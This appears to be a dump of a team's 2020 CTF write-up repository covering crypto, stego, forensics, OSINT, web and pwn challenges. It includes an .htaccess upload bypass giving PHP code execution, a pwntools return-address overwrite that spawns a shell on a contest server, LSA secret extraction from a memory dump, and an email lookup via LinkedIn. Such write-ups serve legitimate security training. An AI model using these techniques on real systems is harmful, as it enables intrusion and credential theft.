26 | - 'r' ^ 06 = 't'
27 | - 'o' ^ 06 = 'i'
28 | - 'o' ^ 0c = 'c'
29 | - 't' ^ 17 = 'c'
30 | - '{' ^ 18 = 'c'
31 | - '}' ^ 1b = 'f'
32 |
33 | **FLAG:** `b00t2root{fantasticc}`
34 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Try try but don't cry/chall.py:
--------------------------------------------------------------------------------
1 | import random
2 | def xor(a,b):
3 | l=""
4 | for i in range(min(len(a), len(b))):
5 | l+=chr(ord(a[i]) ^ ord(b[i]))
6 | return l
7 |
8 | def encrypt(flag):
9 | l=random.randrange(2)
10 | if(l==0):
11 | return flag.encode('base64')
12 | elif(l==1):
13 | return flag.encode('hex')
14 |
15 |
16 | flag="################"
17 | assert(len(flag)==22)
18 | c=xor(flag[:11], flag[11:])
19 | c=c.encode('hex')
20 |
21 | n=random.randint(1,20)
22 | #print(n)
23 |
24 | for _ in range(n):
25 | c=encrypt(c)
26 |
27 | f=open('chall.txt', 'w')
28 | f.write(c)
29 | f.close()
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Try try but don't cry/cyberchef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/Try try but don't cry/cyberchef.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Upload/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 | # Upload(web)
4 |
5 | url : http://198.211.100.125:8080/upload.php
6 |
7 | After every hit-end trial method of uploading php code with different extensions. file Upload successfully with different php extensions (`php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtml, .pgif, .shtml, .htaccess, .phar, .inc`) but code not work.
8 |
9 |
10 | may be it is due to the **.htaccess protection**.
11 |
12 | and this **upload.php** file always **overwrite** the existing file during uploading in directory.
13 |
14 | so i decided to change the content **under .htaccess**.
15 |
16 | than i make a **.htaccess** file with configuration.
17 |
18 | ```AddType application/x-httpd-php .png```
19 |
20 | The above configuration would instruct the Apache HTTP Server to execute PNG images as though they were PHP scripts
21 |
22 | **.htaccess** uploading success(hurray .htaccess file overwrited with our conf)
23 | 
24 |
25 |
26 | ----
27 | lets upload the php code with .png extension and donot forgot to change content-type in burpsuite while uploading
28 |
29 |
30 | ```Content-Type: application/x-httpd-php```
31 |
32 |
33 | 
34 | 
35 | 
36 |
37 | # flag : b00t2root{remote_code_execution_vulnerability}
38 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Upload/Ryn0.png:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Upload/flag.txt:
--------------------------------------------------------------------------------
1 | b00t2root{remote_code_execution_vulnerability}
2 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Upload/htaccess:
--------------------------------------------------------------------------------
1 | AddType application/x-httpd-php .png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/Welcome To Pwn/README.md:
--------------------------------------------------------------------------------
1 | # Welcome To Pwn
2 |
3 | **Category**: Pwn \
4 | **Points**: 457
5 | **Solves**: 34
6 | **Author**: Viper_S
7 |
8 | ## Description
9 |
10 | > Welcome to pwn, here is an easy challenge to get you started.
11 |
12 | > nc 35.238.225.156 1001
13 |
14 | ## Solution
15 |
16 | Just overwrite the return address with a ROP Chain of ret gadget and the get_shell function
17 |
18 | ```python
19 | #!/usr/bin/env python3
20 | import sys
21 | from pwn import *
22 |
23 | elf = ELF('./welcome')
24 | context.binary = elf
25 | if len(sys.argv) > 1:
26 | p = remote('35.238.225.156',1001)
27 | else:
28 | p = process(elf.path)
29 |
30 |
31 | get_shell = 0x0401182
32 | ret = 0x00401140
33 |
34 | payload = b"A"*152+p64(ret)+p64(get_shell)
35 | p.sendlineafter("got",payload)
36 | p.interactive()
37 | ```
38 |
39 | **Flag : b00t2root{W3lc0m3_T0_Pwn_YjAwdDJyb290JzIw}**
40 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/boot2root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/Boot2root_ctf/boot2root.png
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/rasput1n's string/README.md:
--------------------------------------------------------------------------------
1 | # rasput1n's string
2 | **category: programming**
3 | **points: 446**
4 |
5 | ## Description
6 | Given an encrypted message, rasput1n encodes it the following way:
7 |
8 | Removes the median letter of the word from the original word and appends it to the end of the encrypted word and repeats the process until there are no letters left.
9 |
10 | A median letter in a word is the letter present in the middle of the word and if the word length is even, the median letter is the left one out of the two middle letters.
11 |
12 | Can you decode the string?
13 |
14 | ## Solution
15 | The mechanism of the encoding is already given in the question. We just need to reverse that.
16 | Here's a python script to do that.
17 |
18 | ```python
19 | import re
20 |
21 | with open('file', 'r') as f:
22 | str1 = f.read()
23 |
24 | n = len(str1)
25 | me = (n + 1) // 2
26 |
27 | result = [''] * n
28 | result[me - 1] = str1[0]
29 | str1 = str1[1:]
30 |
31 | j = me - 2
32 | for i in range(0, n - 1, 2):
33 | result[j] = str1[i]
34 | j -= 1
35 |
36 | j = me
37 | for i in range(1, n - 1, 2):
38 | result[j] = str1[i]
39 | j += 1
40 |
41 | str2 = ''.join(result)
42 | flag = re.findall('b00t2root{.*}', str2)[0]
43 | print(flag)
44 | ```
45 |
46 | **FLAG:** `b00t2root{@The_Director_is_the_bot}`
47 |
--------------------------------------------------------------------------------
/2020/Boot2root_ctf/rasput1n's string/getflag.py:
--------------------------------------------------------------------------------
1 | import re
2 |
3 | with open('file', 'r') as f:
4 | str1 = f.read()
5 |
6 | n = len(str1)
7 | me = (n + 1) // 2
8 |
9 | result = [''] * n
10 | result[me - 1] = str1[0]
11 | str1 = str1[1:]
12 |
13 | j = me - 2
14 | for i in range(0, n - 1, 2):
15 | result[j] = str1[i]
16 | j -= 1
17 |
18 | j = me
19 | for i in range(1, n - 1, 2):
20 | result[j] = str1[i]
21 | j += 1
22 |
23 | str2 = ''.join(result)
24 | flag = re.findall('b00t2root{.*}', str2)[0]
25 | print(flag)
26 |
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/La voie du SAGE/Sage_Part_1_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/La voie du SAGE/Sage_Part_1_1.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/La voie du SAGE/Sage_Part_1_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/La voie du SAGE/Sage_Part_1_2.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/Le SAGE doré/Sage_Part_0_1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/Le SAGE doré/Sage_Part_0_1.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/Le SAGE doré/Sage_Part_0_2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/Le SAGE doré/Sage_Part_0_2.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/README.md:
--------------------------------------------------------------------------------
1 |
2 | # InterIUT CTF 2020
3 |
4 | **Site**: https://ctf.hack2g2.fr/
5 |
6 | **Rank**: 5 / 87
7 |
8 | 
9 | 
10 |
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/cature_the_flag/README.md:
--------------------------------------------------------------------------------
1 | # Cature The Flag
2 |
3 | **Category**: Steganography \
4 | **Points**: 10
5 |
6 | ## Discription
7 |
8 | - Left To Right
9 | - Hex
10 |
11 | ## Challenge
12 |
13 | - Given PNG Image
14 | - Get flag
15 |
16 | ## Solution
17 |
18 | We were given a png image
19 |
20 | 
21 |
22 | After reading the discription it was clear that solution is related to `Hex`, I though it would be changing the magic numbers of the image. But that was not the case.
23 |
24 | So i researched a bit and got an idea, that it could be reading the hex value of colors, for that purpose i got a great website : `https://html-color-codes.info/colors-from-image/`
25 |
26 | 
27 |
28 | Decoding all colors hex value from left to right, First background colors then the symbols from left to right gives us
29 |
30 | ```
31 | 433031
32 | 307235
33 | 5F4330
34 | 643335
35 | 5F4D34
36 | 4E5F21
37 | ```
38 |
39 | lets convert it to `ASCII` with `Cyberchef`
40 |
41 | 
42 |
43 | FLAG : H2G2{C010r5_C0d35_M4N_!}
44 |
45 |
46 |
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/cature_the_flag/chall.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/cature_the_flag/chall.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/cature_the_flag/cyberchef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/cature_the_flag/cyberchef.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/cature_the_flag/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/cature_the_flag/website.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/data_recovery_1/README.md:
--------------------------------------------------------------------------------
1 | # Data Recovery 1
2 |
3 | **Category**: OSINT \
4 | **Points**: 50
5 |
6 | ## Description
7 |
8 | Find Email Of The RSSI Of Random Corp.
9 |
10 | ## Solution
11 |
12 | We were provided with a post `RSSI` of a company `Random Corp.`
13 |
14 | As we all know the best place to look up for companies and thier employee is `Lindedin`. So i searched on linkedin `RSSI Random Corp.` and the first profile was for us
15 |
16 | 
17 |
18 | Looked deep into her profile but there was no email mentioned in her profile. so i looked up for a website that can gather emails from a profile
19 | and `https://skrapp.io/app/email-finder` worked for me
20 |
21 | 
22 |
23 | we got the email !!!
24 |
25 | FLAG : `H2G2{giseleletrou@randomcorp.bzh}`
26 |
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/data_recovery_1/linkedin.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/data_recovery_1/linkedin.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/data_recovery_1/skrapp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/data_recovery_1/skrapp.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/graph.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/graph.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/ping_pong/ping_pong.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/ping_pong/ping_pong.pcapng
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/rank.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/rank.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you/hash:
--------------------------------------------------------------------------------
1 | 0a5a0a121c309891420d117b7efc169d78ec233351e2b86b9778df7af3bd8a5e82ab3d3715b7fa405cca193dc7c6e484acec3bdf343ea94667c6be451a508e9a
2 |
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you/hash-types.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you/hash-types.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/README.md:
--------------------------------------------------------------------------------
1 | # We Will Rock You Again
2 |
3 | **Category**: Hash Cracking \
4 | **Points**: 50
5 |
6 | ## Challenge
7 |
8 | - Given Hash And Salt
9 | - Crack The Hash
10 |
11 | ## Solution
12 |
13 | We were given a hash and salt : `d809ee9ad068d33b71f48ad7507970e1:RonaldMcDonald`
14 |
15 | First of all i used Hash-Identifier to identify the hash type
16 |
17 | 
18 |
19 | So we are given a `MD5` hash and thier are lots of website and tool that can be used to crack `MD5` hash with salt, but none of them worked.
20 |
21 | Hash-Identifier also gives a possibility that it can be a `MD5(HMAC)`, so i looked hashcat for `MD5(HMAC)`
22 |
23 | 
24 |
25 | Now its time to fire up hashcat with `-m 60` as mentioned in hashcat help with `Rockyou.txt` wordlist
26 |
27 | 
28 |
29 | And It worked!!!
30 |
31 | 
32 |
33 | FLAG : `H2G2{Jackdaniels}`
34 |
35 |
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/hash-identifier.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you_again/hash-identifier.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/hashcatss.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you_again/hashcatss.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you_again/help.png
--------------------------------------------------------------------------------
/2020/InterIUT_ctf/we_will_rock_you_again/show.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/InterIUT_ctf/we_will_rock_you_again/show.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Aether plane take off/aether_plane_take_off.wav:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Aether plane take off/aether_plane_take_off.wav
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Aether plane take off/figidi-result.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Aether plane take off/figidi-result.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Astatine/Base85CyberChef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Astatine/Base85CyberChef.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Astatine/README.md:
--------------------------------------------------------------------------------
1 | # Astatine {10 points}🧪
2 |
3 | ###### Challenge Description
4 |
5 | Can you read the message?
6 |
7 | 5t4=2<(;4P0Q^YXDIYA21Ltn
8 |
9 | ###### Category : Steganography
10 | ###### Author : Jerin John Mathew (Shadow_Walker)
11 | ###### Team : Red Knights
12 |
13 |  
14 |
15 | So this is a Steganography challenge in which we have a **crypted text : 5t4=2<(;4P0Q^YXDIYA21Ltn**
16 |
17 | The Challenge title gives us the name... _Astatine_
18 |
19 | So....
20 | time for a _chemistry class_ for CTF players... 🤣
21 |
22 | _Astatine_ is basically one of the elements in the periodic table having an **atomic number 85**.
23 | It is the rarest naturally occurring element in the Earth's crust.
24 |
25 | _End of Class_
26 |
27 | This is the hint required "85" and you need to find the type of encryption methods with 85 in their name...
28 | OR a guy having good cryptographic knowledge can understand that it is **BASE 85 Encryption**
29 |
30 | Now you just needed to take the string and submit to **Cyberchef** with base 85 recipie foe decrypting....
31 | and VOILA...
32 |
33 | 
34 |
35 |
36 | # FLAG OBTAINED :--> AFFCTF{n0t_3nc0d3d} ... 🚩
37 |
38 |
39 | For more information on base 85 :---> https://en.wikipedia.org/wiki/Ascii85
40 |
41 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Black Dots/README.md:
--------------------------------------------------------------------------------
1 | # Black Dots
2 |
3 | **Category**: Stego
4 | **Points**: 10
5 |
6 | 
7 | In the given picture. you'll see white & black pixels, after sometime I realized it's pointing to something
8 | I wrote a small script that's convert the white pixel to 0 and the black to 1 , for convert the pixels into binary.
9 | ```
10 | from PIL import Image, ImageDraw
11 | image = Image.open("mg.png")
12 | draw = ImageDraw.Draw(image)
13 | width = image.size[0]
14 | height = image.size[1]
15 | str = ''
16 | pix = image.load()
17 | for x in range(height):
18 | for y in range(width):
19 | r = pix[y, x][0]
20 | g = pix[y, x][1]
21 | b = pix[y, x][2]
22 | sr = (r + g + b)
23 | if sr == 0:
24 | str += '1'
25 | else:
26 | str += '0'
27 | print(str)
28 | ```
29 | And we got the binary , using any online converter we can convert the binary into text.
30 | 
31 |
32 |
33 | the flag is `AFFCTF{MonochromatiC ThinkinG}`
34 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Black Dots/Script2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Black Dots/Script2.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Black Dots/mg.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Black Dots/mg.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/BreakMe/encrypted.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/BreakMe/encrypted.txt
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/BreakMe/public.pem:
--------------------------------------------------------------------------------
1 | -----BEGIN PUBLIC KEY-----
2 | MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAL5fZwx838wL00ES071xIp/T5EblMb81
3 | FgNsElgzb2xRAgMBAAE=
4 | -----END PUBLIC KEY-----
5 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Catch_me_if_you_can/images/img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Catch_me_if_you_can/images/img.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Catch_me_if_you_can/images/long-polls.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Catch_me_if_you_can/images/long-polls.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Catch_me_if_you_can/images/pwn.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Catch_me_if_you_can/images/pwn.gif
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/README.md:
--------------------------------------------------------------------------------
1 | # Writeup: Char Wrap:triangular_flag_on_post:
2 |
3 | ***Category : Forensic***:minidisc:\
4 | ***Points : 10***\
5 | ***Author : krn bhargav (Ryn0)*** \
6 | ***Team : Red-Knights***:warning:
7 | ## Description
8 | >only [file](https://github.com/Red-Knights-CTF/writeups/raw/master/2020/affinity_ctf_lite/Char_Wrap/charwrap) given.
9 |
10 | 
11 |
12 | ## solution
13 | >This is only elf-64 file.
14 |
15 | 
16 |
17 | >use strings to get flag(flag format : AFFCTF{})
18 |
19 | 
20 |
21 | >then remove 'H', you got
22 | ```
23 | Flag : AFFCTF{you_found_somethiHng!}
24 | ```
25 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/charwrap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Char_Wrap/charwrap
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/charwrap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Char_Wrap/charwrap.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/file.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Char_Wrap/file.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Char_Wrap/stringsuse.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Char_Wrap/stringsuse.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Classic_Forensics/README.md:
--------------------------------------------------------------------------------
1 | # Writeup: Classic Forensic:triangular_flag_on_post:
2 |
3 | ***Category : Forensic***:minidisc:\
4 | ***Points : 425***\
5 | ***Author : krn bhargav (Ryn0)*** \
6 | ***Team : Red-Knights***:warning:
7 | ## Description
8 | >We need to do some classic forensic stuff on this mem dump, can you help us and check what is important there?
9 |
10 | [Dumpfile](https://2020.affinityctf.com/files/f8289d6b397154b768538dd9213d4589/mem.dmp.7z)-259 MB (sorry for not uploading.)
11 |
12 | 
13 |
14 | ## solution
15 | >We have a MS Windows 64bit crash dump,for this we have to use the tool [Volatility3](https://github.com/volatilityfoundation/volatility3).
16 | >Thanks to the authors for making our life easy.
17 |
18 | 
19 |
20 | >During this ctf,I try everything to analyse this MEMORY.dmp but donot find anything ,finally i use this command.
21 |
22 | ```
23 | vol.py -f MEMORY.dmp windows.lsadump
24 | ```
25 | >in this command we used the lsadump plugin to extract lsa secrets.
26 | >and found flag
27 | 
28 |
29 | ```
30 | Flag : AFFCTF{f0rensic_w3ll_d0n3}
31 | ```
32 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Classic_Forensics/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Classic_Forensics/description.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Classic_Forensics/fileinfo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Classic_Forensics/fileinfo.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Classic_Forensics/volatility.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Classic_Forensics/volatility.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Fibonacci/Fibonacci.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Fibonacci/Fibonacci.7z
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Fibonacci/main.py:
--------------------------------------------------------------------------------
1 | def gen_fib(n):
2 | ans = [0, 1]
3 | while ans[-1] < n:
4 | ans.append(ans[-1] + ans[-2])
5 | return ans
6 |
7 |
8 | i = 0
9 | with open('out.7z', 'wb') as fout:
10 | with open('Fibonacci.7z', 'rb') as fin:
11 | fibs = gen_fib(1000)
12 | fibs = set(fibs)
13 |
14 | while True:
15 | b = fin.read(1)
16 | if b == b'':
17 | break
18 |
19 | if i not in fibs:
20 | fout.write(b)
21 |
22 | i += 1
23 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Fibonacci/out.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Fibonacci/out.7z
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Hongqiao/README.md:
--------------------------------------------------------------------------------
1 | # Hongqiao
2 |
3 | **Category: Crypto** \
4 | **Points: 10**
5 |
6 | ## Desciption
7 |
8 | The flag is AFFCTF{395f4dfc82f56b796b23c3fa1b5150cbe568d71e} but the content is encrypted! Can you discover the flag content?
9 |
10 | ## Challenge
11 |
12 | - Given Hash
13 | - Find The Flag
14 |
15 | ## Solution
16 |
17 | We were given a `SHA-1` hash `395f4dfc82f56b796b23c3fa1b5150cbe568d71e` .I have used https://crackstation.net to crack the hash
18 |
19 | 
20 |
21 | FLAG - AFFCTF{Unimaginatively}
22 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Hongqiao/crackstation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Hongqiao/crackstation.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/I need bass/b58CyberChef.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/I need bass/b58CyberChef.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/I need bass/site.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/I need bass/site.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Lost_Head/README.md:
--------------------------------------------------------------------------------
1 | # Writeup: Lost Head:triangular_flag_on_post:
2 |
3 | ***Category : Forensic***:minidisc:\
4 | ***Points : 50***\
5 | ***Author : krn bhargav (Ryn0)*** \
6 | ***Team : Red-Knights***:warning:
7 | ## Description
8 | >We lost some data when the connection closed, can you recover something?
9 |
10 | [file](lostHead.pcapng)
11 |
12 | 
13 |
14 | ## solution
15 | >we have a pcap file ,open it in wireshark,filter the http protocol and check the response from 'GET challenge.php' request
16 |
17 | >you got flag in X-Affinity header.
18 |
19 | 
20 |
21 | ```
22 | Flag : AFFCTF{DonT_TRust_h34d3r2}
23 | ```
24 |
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Lost_Head/description.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Lost_Head/description.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Lost_Head/lostHead.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Lost_Head/lostHead.pcapng
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Lost_Head/wiresharkscreenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Lost_Head/wiresharkscreenshot.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/flag_printed.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/flag_printed.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/jmp.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/jmp.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/magicword:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/magicword
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/magicword.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Red-Knights-CTF/writeups/5b6128a4a248303fdf2b9f881a7ef3bb6e6f528d/2020/affinity_ctf_lite/Magic Word/magicword.png
--------------------------------------------------------------------------------
/2020/affinity_ctf_lite/Magic Word/nops.png:
--------------------------------------------------------------------------------
